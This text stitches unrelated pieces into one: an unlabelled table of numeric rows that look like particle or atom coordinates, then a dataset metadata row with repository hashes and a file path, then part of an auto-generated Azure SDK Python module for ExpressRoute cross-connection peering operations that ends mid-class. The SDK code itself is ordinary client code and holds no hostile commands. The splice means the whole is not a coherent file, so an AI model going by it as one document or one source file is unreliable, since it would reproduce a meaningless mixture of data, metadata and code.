1717 1 0.619858 0.621448 0.628661
996 1 0.995757 0.423939 0.930001
1908 1 0.505419 0.936444 0.816547
2045 1 0.876257 0.87449 0.872196
724 1 0.503056 0.318609 0.681759
1563 1 0.807102 0.499786 0.561631
1559 1 0.684022 0.499144 0.563503
1564 1 0.747943 0.557487 0.565651
1591 1 0.6912 0.620628 0.562963
1595 1 0.813987 0.620078 0.560312
1686 1 0.684864 0.556054 0.628586
1690 1 0.807831 0.561331 0.621303
1721 1 0.751858 0.630897 0.632849
2020 1 0.993065 0.943556 0.932622
1764 1 0.996985 0.940177 0.688954
1924 1 0.991052 0.568035 0.937072
1568 1 0.872321 0.554685 0.564001
1599 1 0.938026 0.62021 0.55547
1694 1 0.932218 0.561066 0.615397
1725 1 0.880422 0.62419 0.619977
900 1 0.999323 0.0679366 0.937904
2046 1 0.941272 0.936225 0.871201
2047 1 0.93259 0.87704 0.933979
2048 1 0.884633 0.943264 0.934628
1592 1 0.628436 0.683782 0.555182
1619 1 0.564723 0.756199 0.557443
1624 1 0.623815 0.810368 0.561815
1714 1 0.560034 0.684075 0.623361
1746 1 0.56286 0.81242 0.623441
1749 1 0.620625 0.744385 0.620366
580 1 0.992632 0.31231 0.564725
25 1 0.754754 0.00490999 0.994852
1596 1 0.74697 0.685294 0.562304
1623 1 0.682687 0.747216 0.560689
1627 1 0.811717 0.746391 0.563315
1628 1 0.750986 0.810389 0.563062
1718 1 0.675229 0.683997 0.628025
1722 1 0.810259 0.684342 0.61905
1750 1 0.684983 0.809612 0.618103
1753 1 0.747399 0.748726 0.61631
1754 1 0.815324 0.815038 0.625131
961 1 0.99553 0.23996 0.866695
1146 1 0.814532 0.937735 0.997335
833 1 0.998744 0.248644 0.739914
753 1 0.499652 0.384951 0.62442
1600 1 0.883672 0.690203 0.562475
1631 1 0.947125 0.747491 0.566033
1632 1 0.872904 0.812674 0.560888
1726 1 0.940909 0.68824 0.629699
1757 1 0.880783 0.74564 0.626136
1758 1 0.944828 0.8009 0.624906
1745 1 0.50581 0.745578 0.6278
1892 1 0.999036 0.936609 0.814305
1651 1 0.553604 0.871874 0.559653
1656 1 0.626873 0.935123 0.563547
1778 1 0.55451 0.935541 0.630398
1781 1 0.625416 0.868263 0.624402
977 1 0.501017 0.247607 0.874571
1841 1 0.501253 0.624403 0.752188
665 1 0.751333 0.997082 0.626929
1713 1 0.50031 0.619825 0.623906
1655 1 0.684059 0.872524 0.562423
1659 1 0.812285 0.868628 0.561139
1660 1 0.747878 0.935414 0.564956
1782 1 0.686034 0.93829 0.62247
1785 1 0.749009 0.868393 0.622087
1786 1 0.812172 0.936528 0.617624
562 1 0.565614 0.189792 0.500399
669 1 0.878629 0.997909 0.615716
1663 1 0.937174 0.869588 0.559512
1664 1 0.880726 0.93696 0.561934
1789 1 0.87854 0.871954 0.620699
1790 1 0.936788 0.937821 0.620492
2039 1 0.688065 0.872673 0.936532
689 1 0.499127 0.130443 0.618299
664 1 0.630746 0.0563049 0.691581
691 1 0.563708 0.128306 0.688933
786 1 0.558481 0.0641262 0.743832
792 1 0.630223 0.0555101 0.805455
819 1 0.565513 0.116965 0.808904
821 1 0.624839 0.119564 0.749473
787 1 0.563423 0.00358171 0.807348
789 1 0.633125 0.992757 0.749858
2041 1 0.751233 0.873229 0.877252
1684 1 0.501245 0.562049 0.68508
668 1 0.749628 0.0596002 0.68726
695 1 0.690471 0.127759 0.692967
699 1 0.813785 0.118003 0.679437
790 1 0.695008 0.0610698 0.748663
794 1 0.814146 0.0657543 0.750388
796 1 0.756647 0.0630282 0.814141
823 1 0.688224 0.12543 0.810266
825 1 0.750125 0.133535 0.751194
827 1 0.809115 0.130138 0.810735
793 1 0.763084 1.001 0.743618
791 1 0.693737 0.997395 0.805314
672 1 0.87226 0.0563011 0.68524
703 1 0.937406 0.122839 0.682092
798 1 0.938036 0.0616211 0.747384
800 1 0.881578 0.0622248 0.810497
829 1 0.874689 0.123407 0.74827
831 1 0.936776 0.124711 0.814829
797 1 0.876137 0.00100586 0.750051
799 1 0.938957 0.00198335 0.810563
2043 1 0.817828 0.875291 0.934776
2042 1 0.815211 0.940531 0.877696
2044 1 0.749727 0.93776 0.927498
696 1 0.626307 0.188865 0.685276
723 1 0.557094 0.250564 0.684903
728 1 0.618554 0.315641 0.684975
818 1 0.564449 0.183373 0.746202
824 1 0.621881 0.190292 0.811527
850 1 0.561142 0.309941 0.749475
851 1 0.556598 0.248356 0.814119
853 1 0.624655 0.251172 0.74716
856 1 0.625658 0.310062 0.811265
700 1 0.752883 0.189935 0.681709
727 1 0.691936 0.253981 0.687696
731 1 0.81426 0.244763 0.682585
732 1 0.754776 0.310508 0.678709
822 1 0.68424 0.189773 0.749512
826 1 0.816328 0.183013 0.749645
828 1 0.741765 0.188997 0.807755
854 1 0.690171 0.307103 0.753074
855 1 0.68795 0.24881 0.813838
857 1 0.746695 0.245753 0.747795
858 1 0.815797 0.303402 0.754067
859 1 0.816677 0.240057 0.809275
860 1 0.754698 0.300594 0.808894
1665 1 0.991736 0.499776 0.625059
704 1 0.877903 0.186825 0.685777
735 1 0.940492 0.239925 0.681824
736 1 0.87594 0.313358 0.683271
830 1 0.941271 0.182967 0.74688
832 1 0.878673 0.189359 0.813402
861 1 0.875703 0.24723 0.744504
862 1 0.933282 0.319094 0.747835
863 1 0.937446 0.242561 0.802413
864 1 0.875304 0.304042 0.809033
1053 1 0.870309 0.499882 0.995852
1956 1 0.996519 0.681795 0.937235
1114 1 0.814245 0.814604 0.996304
755 1 0.556521 0.37672 0.699472
760 1 0.628882 0.440112 0.687244
882 1 0.567269 0.446141 0.752382
883 1 0.567313 0.377823 0.815363
885 1 0.626749 0.372571 0.753779
888 1 0.63655 0.435179 0.817917
1813 1 0.635393 0.505769 0.754589
1629 1 0.874367 0.746874 0.502778
532 1 0.50603 0.0643544 0.560807
759 1 0.68972 0.369898 0.682565
763 1 0.809448 0.36885 0.681482
764 1 0.747742 0.437692 0.681472
886 1 0.6893 0.427904 0.755251
887 1 0.691031 0.366668 0.811263
889 1 0.753018 0.369357 0.748434
890 1 0.801323 0.438107 0.745016
891 1 0.810049 0.370742 0.81553
892 1 0.749905 0.436284 0.809459
1819 1 0.80956 0.492595 0.813293
1817 1 0.74677 0.504067 0.745559
1815 1 0.695511 0.496289 0.810387
1691 1 0.811177 0.498917 0.681137
1687 1 0.689132 0.494163 0.684247
1700 1 0.999975 0.69049 0.688137
897 1 0.990817 0.996545 0.872661
1974 1 0.688011 0.688475 0.871484
1074 1 0.561218 0.695569 1.00055
767 1 0.929207 0.382389 0.685449
768 1 0.870069 0.438374 0.682592
893 1 0.863465 0.374492 0.747323
894 1 0.929931 0.435832 0.749388
895 1 0.935012 0.372968 0.812969
896 1 0.871933 0.435201 0.808531
1695 1 0.93405 0.502709 0.688867
1821 1 0.864576 0.502367 0.752088
1978 1 0.808516 0.689293 0.874849
836 1 0.997734 0.306067 0.81158
2038 1 0.688454 0.933495 0.871264
1683 1 0.562185 0.504842 0.685559
1811 1 0.560572 0.501186 0.815933
1688 1 0.621758 0.562716 0.689848
1715 1 0.562122 0.619352 0.685503
1810 1 0.565992 0.559567 0.751434
1816 1 0.622295 0.564884 0.820437
1843 1 0.563714 0.62964 0.813311
1845 1 0.625907 0.618908 0.751994
1692 1 0.747122 0.557282 0.67921
1719 1 0.689451 0.627207 0.690917
1723 1 0.813933 0.618815 0.692648
1814 1 0.692197 0.56878 0.755
1818 1 0.808714 0.560724 0.757088
1820 1 0.74837 0.556332 0.811245
1847 1 0.689514 0.624135 0.812537
1849 1 0.751417 0.624492 0.744556
1851 1 0.813139 0.620152 0.811428
1823 1 0.932033 0.494547 0.814841
1696 1 0.871312 0.557308 0.690914
1727 1 0.932648 0.624058 0.688409
1822 1 0.929022 0.564715 0.756204
1824 1 0.87205 0.558396 0.818243
1853 1 0.872933 0.624231 0.754064
1855 1 0.931317 0.631626 0.815793
1720 1 0.615858 0.682284 0.686329
1747 1 0.560145 0.748984 0.686989
1752 1 0.621298 0.805394 0.689052
1842 1 0.556665 0.687292 0.744244
1848 1 0.629076 0.688295 0.810738
1874 1 0.563141 0.812951 0.749104
1875 1 0.56863 0.750892 0.814296
1877 1 0.62539 0.745941 0.747407
1880 1 0.631096 0.815214 0.806708
2033 1 0.507502 0.869851 0.875079
1724 1 0.745905 0.691323 0.68095
1751 1 0.686464 0.748242 0.679468
1755 1 0.80918 0.747909 0.683055
1756 1 0.74893 0.811583 0.687031
1846 1 0.686662 0.684148 0.753042
1850 1 0.812098 0.686906 0.746026
1852 1 0.754209 0.676888 0.810745
1878 1 0.688154 0.813033 0.746561
1879 1 0.696052 0.749538 0.806124
1881 1 0.748679 0.751674 0.743591
1882 1 0.820032 0.818438 0.748628
1883 1 0.814311 0.747522 0.801429
1884 1 0.75364 0.814913 0.803612
1825 1 0.997808 0.623462 0.745675
1657 1 0.751197 0.871857 0.503016
2009 1 0.745485 0.749463 0.867876
1728 1 0.876181 0.685435 0.681579
1759 1 0.931761 0.746674 0.687825
1760 1 0.87626 0.814319 0.682888
1854 1 0.937596 0.685036 0.753856
1856 1 0.873546 0.69383 0.810991
1885 1 0.874152 0.754106 0.741922
1886 1 0.936623 0.808392 0.75106
1887 1 0.940775 0.746692 0.813866
1888 1 0.880043 0.806078 0.809733
1793 1 0.997721 0.499522 0.75041
659 1 0.559987 0.997655 0.682419
1779 1 0.564875 0.873486 0.685956
1784 1 0.626457 0.936351 0.680052
1906 1 0.567316 0.937075 0.742782
1907 1 0.563688 0.875058 0.805611
1909 1 0.629767 0.870205 0.744434
1912 1 0.632081 0.934052 0.812703
2007 1 0.685091 0.748605 0.941819
667 1 0.814099 0.992235 0.683231
795 1 0.815209 -0.00128589 0.815232
663 1 0.69195 0.997509 0.680759
1783 1 0.69073 0.868918 0.682407
1787 1 0.817027 0.876717 0.682991
1788 1 0.751443 0.932787 0.685203
1910 1 0.690592 0.933141 0.751388
1911 1 0.695741 0.874541 0.811007
1913 1 0.756494 0.874175 0.743173
1914 1 0.814696 0.939389 0.748912
1915 1 0.813222 0.878768 0.809846
1916 1 0.754402 0.935441 0.81106
671 1 0.932322 0.000971202 0.694071
1791 1 0.941101 0.869938 0.681161
1792 1 0.881159 0.940149 0.684665
1917 1 0.882007 0.877396 0.739357
1918 1 0.937516 0.939249 0.754573
1919 1 0.943188 0.870273 0.820051
1920 1 0.874352 0.934039 0.817563
2010 1 0.812865 0.816509 0.868644
914 1 0.568477 0.0648241 0.878836
920 1 0.631078 0.0628216 0.941204
947 1 0.575778 0.123643 0.933957
949 1 0.629129 0.124801 0.86431
915 1 0.57117 0.997901 0.937393
917 1 0.630478 0.00554219 0.878851
921 1 0.754601 0.995778 0.871231
594 1 0.565769 0.311646 0.502251
919 1 0.690437 0.996827 0.936299
918 1 0.692214 0.0608551 0.867703
922 1 0.81456 0.0592938 0.875378
924 1 0.75041 0.0586754 0.927573
951 1 0.68892 0.125843 0.931433
953 1 0.749673 0.129632 0.871368
955 1 0.809948 0.121406 0.933414
923 1 0.823161 0.998075 0.934447
884 1 0.507858 0.437943 0.814874
925 1 0.890534 0.00468751 0.873949
927 1 0.937595 0.00822015 0.944416
2040 1 0.633932 0.928914 0.933903
2037 1 0.624452 0.876721 0.870478
926 1 0.941609 0.0634844 0.875829
928 1 0.886659 0.0705839 0.938223
957 1 0.875398 0.123778 0.875217
959 1 0.940958 0.132954 0.937073
2012 1 0.753888 0.806701 0.938348
628 1 0.503181 0.438527 0.562847
1980 1 0.743754 0.688774 0.946158
2006 1 0.686396 0.813964 0.87558
18 1 0.564996 0.0639001 0.997609
979 1 0.558732 0.245224 0.939967
952 1 0.624526 0.193155 0.931966
946 1 0.566589 0.182495 0.875725
984 1 0.617256 0.310563 0.942213
978 1 0.565424 0.314433 0.874603
981 1 0.623435 0.258845 0.878847
1658 1 0.809228 0.931031 0.506975
1661 1 0.8745 0.875148 0.501245
1697 1 0.993609 0.615492 0.625866
1860 1 0.999399 0.812676 0.819533
1653 1 0.621811 0.868094 0.502525
956 1 0.754203 0.189152 0.930816
986 1 0.817967 0.308183 0.875919
954 1 0.813724 0.187938 0.873036
950 1 0.680117 0.187122 0.873461
985 1 0.753681 0.247653 0.876554
988 1 0.755217 0.308934 0.932011
982 1 0.687835 0.307565 0.868749
983 1 0.688272 0.248549 0.935672
987 1 0.818261 0.246127 0.932727
1984 1 0.873919 0.688168 0.948033
2016 1 0.874331 0.805747 0.941996
1761 1 1.002 0.87223 0.621081
913 1 0.508363 0.00641558 0.873822
958 1 0.937775 0.184275 0.875182
990 1 0.935091 0.306035 0.867586
989 1 0.877402 0.251209 0.876486
960 1 0.873746 0.182034 0.943429
992 1 0.877396 0.307014 0.937185
991 1 0.940613 0.246775 0.937387
1668 1 0.994792 0.561081 0.694909
2013 1 0.867109 0.752536 0.874522
2011 1 0.807057 0.749734 0.934884
1121 1 0.998097 0.873208 0.99872
1013 1 0.631205 0.372392 0.876079
1011 1 0.563612 0.371172 0.938553
1016 1 0.628177 0.432614 0.936567
1010 1 0.567986 0.433247 0.882971
1941 1 0.621722 0.500958 0.87549
2015 1 0.930725 0.750854 0.950536
1019 1 0.818992 0.377346 0.942158
1018 1 0.809046 0.434158 0.878285
1015 1 0.689145 0.372725 0.940368
1014 1 0.689468 0.43159 0.876663
1020 1 0.752283 0.435341 0.939431
1017 1 0.752772 0.37072 0.883323
1947 1 0.811832 0.500092 0.936256
1945 1 0.749021 0.497552 0.870513
2014 1 0.931884 0.805718 0.875297
1024 1 0.875917 0.444146 0.938064
1023 1 0.933939 0.372261 0.936209
1022 1 0.925485 0.428235 0.870342
1021 1 0.871648 0.367124 0.865347
1949 1 0.871363 0.498559 0.873363
1951 1 0.935014 0.49496 0.935039
1982 1 0.927051 0.695241 0.881112
2036 1 0.500574 0.929699 0.942763
737 1 0.999699 0.377593 0.635331
2034 1 0.566927 0.941706 0.87623
2035 1 0.558982 0.871649 0.939714
1988 1 0.99484 0.804563 0.933869
1939 1 0.562867 0.511132 0.945372
1938 1 0.556717 0.570377 0.877719
1944 1 0.630835 0.569913 0.939088
1971 1 0.557792 0.630703 0.942706
1973 1 0.627484 0.622585 0.875059
1876 1 0.500627 0.812885 0.810071
849 1 0.502353 0.247437 0.751315
1943 1 0.689572 0.495457 0.939696
1942 1 0.684179 0.559942 0.882004
1946 1 0.809461 0.563924 0.879072
1977 1 0.747919 0.62621 0.875388
1979 1 0.803995 0.629097 0.937297
1948 1 0.745142 0.560756 0.944146
1975 1 0.689308 0.623015 0.939794
740 1 0.997907 0.443571 0.688086
1970 1 0.561048 0.692814 0.871291
1950 1 0.938585 0.562691 0.87135
1981 1 0.87535 0.630335 0.873328
1983 1 0.929291 0.628016 0.934068
1952 1 0.874106 0.565276 0.934834
756 1 0.500301 0.440148 0.693978
1812 1 0.502197 0.567527 0.811904
1976 1 0.625278 0.685188 0.933386
2003 1 0.564979 0.749641 0.931488
2008 1 0.62501 0.820254 0.939995
2002 1 0.569796 0.812436 0.872469
2005 1 0.631232 0.750697 0.872143
948 1 0.50585 0.179539 0.938682
1025 1 0.995653 0.506038 0.996868
1110 1 0.68296 0.815117 0.999311
993 1 1.00082 0.375811 0.861054
1889 1 0.9937 0.877472 0.746327
1796 1 0.997731 0.56453 0.805873
865 1 0.999366 0.374161 0.745528
980 1 0.506951 0.315299 0.941987
86 1 0.684072 0.306958 0.996356
1937 1 0.509197 0.496244 0.882008
1012 1 0.504195 0.432656 0.940554
1857 1 0.997836 0.745299 0.745661
820 1 0.503451 0.185906 0.817912
533 1 0.620045 0.998426 0.500225
94 1 0.930714 0.307463 0.996837
29 1 0.87525 0.00324566 0.994191
97 1 0.997403 0.370075 0.996137
50 1 0.566211 0.184937 0.995103
570 1 0.808763 0.183669 0.503198
602 1 0.813374 0.312498 0.502966
1109 1 0.624418 0.754246 1.00029
601 1 0.748527 0.252414 0.501118
1054 1 0.936649 0.567398 0.998905
541 1 0.880624 0.997729 0.504882
54 1 0.689197 0.190271 0.992318
633 1 0.754265 0.373746 0.501732
637 1 0.866982 0.372666 0.500924
1117 1 0.863988 0.748808 1.00002
1622 1 0.692445 0.811753 0.505967
1150 1 0.942749 0.937857 0.998371
1554 1 0.557951 0.562261 0.499675
545 1 0.996629 0.123588 0.501359
1138 1 0.561746 0.938467 0.993657
1558 1 0.689462 0.562222 0.501865
1049 1 0.754207 0.499676 1.00082
598 1 0.684112 0.312165 0.503543
569 1 0.750529 0.1255 0.502517
1118 1 0.936938 0.81452 0.999097
634 1 0.814635 0.440503 0.502463
574 1 0.94467 0.192009 0.504976
537 1 0.738588 0.999066 0.504885
| [
"[email protected]"
] | |
531c869b8d3f9fe70205838abde06be395c48c31 | a838d4bed14d5df5314000b41f8318c4ebe0974e | /sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_11_01/operations/_express_route_cross_connection_peerings_operations.py | 08a8881447d83d94b97f3db5ac473f1b5a9e0a4e | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | scbedd/azure-sdk-for-python | ee7cbd6a8725ddd4a6edfde5f40a2a589808daea | cc8bdfceb23e5ae9f78323edc2a4e66e348bb17a | refs/heads/master | 2023-09-01T08:38:56.188954 | 2021-06-17T22:52:28 | 2021-06-17T22:52:28 | 159,568,218 | 2 | 0 | MIT | 2019-08-11T21:16:01 | 2018-11-28T21:34:49 | Python | UTF-8 | Python | false | false | 22,711 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class ExpressRouteCrossConnectionPeeringsOperations(object):
"""ExpressRouteCrossConnectionPeeringsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_11_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name, # type: str
cross_connection_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.ExpressRouteCrossConnectionPeeringList"]
"""Gets all peerings in a specified ExpressRouteCrossConnection.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param cross_connection_name: The name of the ExpressRouteCrossConnection.
:type cross_connection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ExpressRouteCrossConnectionPeeringList or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2020_11_01.models.ExpressRouteCrossConnectionPeeringList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ExpressRouteCrossConnectionPeeringList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-11-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'crossConnectionName': self._serialize.url("cross_connection_name", cross_connection_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ExpressRouteCrossConnectionPeeringList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteCrossConnections/{crossConnectionName}/peerings'} # type: ignore
def _delete_initial(
self,
resource_group_name, # type: str
cross_connection_name, # type: str
peering_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-11-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'crossConnectionName': self._serialize.url("cross_connection_name", cross_connection_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteCrossConnections/{crossConnectionName}/peerings/{peeringName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
cross_connection_name, # type: str
peering_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified peering from the ExpressRouteCrossConnection.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param cross_connection_name: The name of the ExpressRouteCrossConnection.
:type cross_connection_name: str
:param peering_name: The name of the peering.
:type peering_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the ARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
cross_connection_name=cross_connection_name,
peering_name=peering_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'crossConnectionName': self._serialize.url("cross_connection_name", cross_connection_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteCrossConnections/{crossConnectionName}/peerings/{peeringName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
cross_connection_name, # type: str
peering_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.ExpressRouteCrossConnectionPeering"
"""Gets the specified peering for the ExpressRouteCrossConnection.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param cross_connection_name: The name of the ExpressRouteCrossConnection.
:type cross_connection_name: str
:param peering_name: The name of the peering.
:type peering_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ExpressRouteCrossConnectionPeering, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_11_01.models.ExpressRouteCrossConnectionPeering
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ExpressRouteCrossConnectionPeering"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-11-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'crossConnectionName': self._serialize.url("cross_connection_name", cross_connection_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ExpressRouteCrossConnectionPeering', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteCrossConnections/{crossConnectionName}/peerings/{peeringName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
cross_connection_name, # type: str
peering_name, # type: str
peering_parameters, # type: "_models.ExpressRouteCrossConnectionPeering"
**kwargs # type: Any
):
# type: (...) -> "_models.ExpressRouteCrossConnectionPeering"
cls = kwargs.pop('cls', None) # type: ClsType["_models.ExpressRouteCrossConnectionPeering"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-11-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'crossConnectionName': self._serialize.url("cross_connection_name", cross_connection_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(peering_parameters, 'ExpressRouteCrossConnectionPeering')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ExpressRouteCrossConnectionPeering', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('ExpressRouteCrossConnectionPeering', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
